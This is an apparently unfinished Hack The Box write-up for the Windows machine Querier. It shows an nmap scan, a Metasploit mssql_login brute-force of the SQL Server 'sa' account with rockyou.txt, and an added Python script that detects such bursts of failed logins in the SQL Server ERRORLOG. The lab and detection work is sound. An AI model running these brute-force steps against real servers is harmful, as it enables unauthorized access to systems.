====== HTB ~~ Machines ~~ Querier (in progress) ======
[[htb|Back]]
**Querier - Windows - 10.10.10.125**
**Open ports:**
nmap -sV -p- 10.10.10.125
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-04 06:01 UTC
Strange read error from 10.10.10.125 (71 - 'Protocol error')
Nmap scan report for ip-10-10-10-125.us-east-2.compute.internal (10.10.10.125)
Host is up (0.13s latency).
Not shown: 65075 closed ports, 445 filtered ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
1433/tcp open ms-sql-s Microsoft SQL Server vNext tech preview 14.00.1000
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
53537/tcp open tcpwrapped
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 36410.39 seconds
''1433/tcp open ms-sql-s Microsoft SQL Server vNext tech preview 14.00.1000'' indicates an MS SQL Server, version 2017 according to this [[http://www.sqldata.fr/versions/microsoft-sql-server-versions-et-services-pack-2000-2005-2008-r2-2012.html|link]].
A brute-force attempt on the ''sa'' account does not succeed, but the VM may have been reset in the meantime (the ''Unable to Connect'' results are connection failures, not rejected passwords):
[-] 10.10.10.125:1433 - 10.10.10.125:1433 - LOGIN FAILED: WORKSTATION\sa:lagorda (Incorrect: )
[-] 10.10.10.125:1433 - 10.10.10.125:1433 - LOGIN FAILED: WORKSTATION\sa:lafayette (Unable to Connect: )
[-] 10.10.10.125:1433 - 10.10.10.125:1433 - LOGIN FAILED: WORKSTATION\sa:lacrosse1 (Unable to Connect: )
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/mssql/mssql_login) >
I relaunch a brute-force attempt with a few different parameters to see:
msf auxiliary(scanner/mssql/mssql_login) > show options
Module options (auxiliary/scanner/mssql/mssql_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS true no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no A specific password to authenticate with
PASS_FILE /home/ec2-user/rockyou.txt no File containing passwords, one per line
RHOSTS 10.10.10.125 yes The target address range or CIDR identifier
RPORT 1433 yes The target port (TCP)
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
TDSENCRYPTION false yes Use TLS/SSL for TDS data "Force Encryption"
THREADS 10 yes The number of concurrent threads
USERNAME administrator no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
USE_WINDOWS_AUTHENT true yes Use windows authentification (requires DOMAIN option set)
VERBOSE true yes Whether to print output for all attempts
msf auxiliary(scanner/mssql/mssql_login) > exploit
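The two ''mssql_login'' runs above are what the attacker side sees. On the server side, every rejected password shows up in the SQL Server ERRORLOG as error 18456 followed by a ''Login failed for user'' line naming the login and the client address, while a run that mostly reports ''Unable to Connect'' leaves far fewer such entries than the tool actually attempted. The script below is an added example, not part of the original write-up or of any HTB material: it parses constructed ERRORLOG lines (the timestamps and client addresses ''10.10.14.5'' / ''10.10.14.20'' are hypothetical) and flags any client that accumulates a burst of failed logins inside a sliding window, which is the detection a defender would want for the activity this page describes. The threshold and window values are assumptions chosen for the sample.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of SQL Server ERRORLOG lines (hypothetical timestamps and
# client addresses, not taken from the target). Each failed login produces an
# "Error: 18456" line followed by a "Login failed for user" line; only the
# second one carries the login name and the client address.
SAMPLE_ERRORLOG = """\
2019-04-04 06:01:00.12 Logon       Error: 18456, Severity: 14, State: 8.
2019-04-04 06:01:00.12 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 10.10.14.5]
2019-04-04 06:01:01.40 Logon       Error: 18456, Severity: 14, State: 8.
2019-04-04 06:01:01.40 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 10.10.14.5]
2019-04-04 06:01:02.03 Logon       Error: 18456, Severity: 14, State: 8.
2019-04-04 06:01:02.03 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 10.10.14.5]
2019-04-04 06:01:03.77 Logon       Error: 18456, Severity: 14, State: 8.
2019-04-04 06:01:03.77 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 10.10.14.5]
2019-04-04 06:01:04.21 Logon       Error: 18456, Severity: 14, State: 8.
2019-04-04 06:01:04.21 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 10.10.14.5]
2019-04-04 06:01:05.09 Logon       Error: 18456, Severity: 14, State: 8.
2019-04-04 06:01:05.09 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 10.10.14.5]
2019-04-04 06:05:12.90 Logon       Error: 18456, Severity: 14, State: 8.
2019-04-04 06:05:12.90 Logon       Login failed for user 'reporting'. Reason: Password did not match that for the login provided. [CLIENT: 10.10.14.20]
"""

# Matches the "Login failed for user" line; the Reason clause is optional
# because some 18456 states omit it.
FAILED_LOGIN = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\.\d+\s+Logon\s+"
    r"Login failed for user '(?P<user>[^']+)'\."
    r"(?: Reason: (?P<reason>.*?))? \[CLIENT: (?P<client>[^\]]+)\]\s*$"
)


def parse_failed_logins(errorlog_text):
    """Return one event dict per 'Login failed for user' line in the log."""
    events = []
    for line in errorlog_text.splitlines():
        m = FAILED_LOGIN.match(line)
        if not m:
            continue  # the paired "Error: 18456" line and unrelated entries
        events.append({
            "ts": datetime.strptime(m.group("ts"), "%Y-%m-%d %H:%M:%S"),
            "user": m.group("user"),
            "reason": m.group("reason") or "",
            "client": m.group("client"),
        })
    return events


def detect_bruteforce(events, threshold=5, window=timedelta(seconds=60)):
    """Flag clients with at least `threshold` failures inside a sliding window.

    Returns {client: {"count", "first", "last", "users"}} describing the
    densest window seen for each flagged client.
    """
    by_client = defaultdict(list)
    for ev in events:
        by_client[ev["client"]].append(ev)

    alerts = {}
    for client, evs in by_client.items():
        evs.sort(key=lambda e: e["ts"])
        start = 0
        for end in range(len(evs)):
            # Advance the window start until it fits inside `window`.
            while evs[end]["ts"] - evs[start]["ts"] > window:
                start += 1
            count = end - start + 1
            if count >= threshold:
                prev = alerts.get(client)
                if prev is None or count > prev["count"]:
                    alerts[client] = {
                        "count": count,
                        "first": evs[start]["ts"],
                        "last": evs[end]["ts"],
                        "users": sorted({e["user"] for e in evs[start:end + 1]}),
                    }
    return alerts


if __name__ == "__main__":
    for client, info in detect_bruteforce(parse_failed_logins(SAMPLE_ERRORLOG)).items():
        print(f"{client}: {info['count']} failed logins for {info['users']} "
              f"between {info['first']} and {info['last']}")
```

With the sample above, ''10.10.14.5'' is flagged (six ''sa'' failures in five seconds) while the single failure from ''10.10.14.20'' is not; in practice the same pattern is worth correlating with the ''sa'' login being enabled at all, since a disabled ''sa'' and a lockout policy on SQL logins remove most of what the attempts above were trying for.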
**CVE**
[[https://www.cvedetails.com/cve/CVE-2018-8273/]]
I did not find an exploit for this CVE.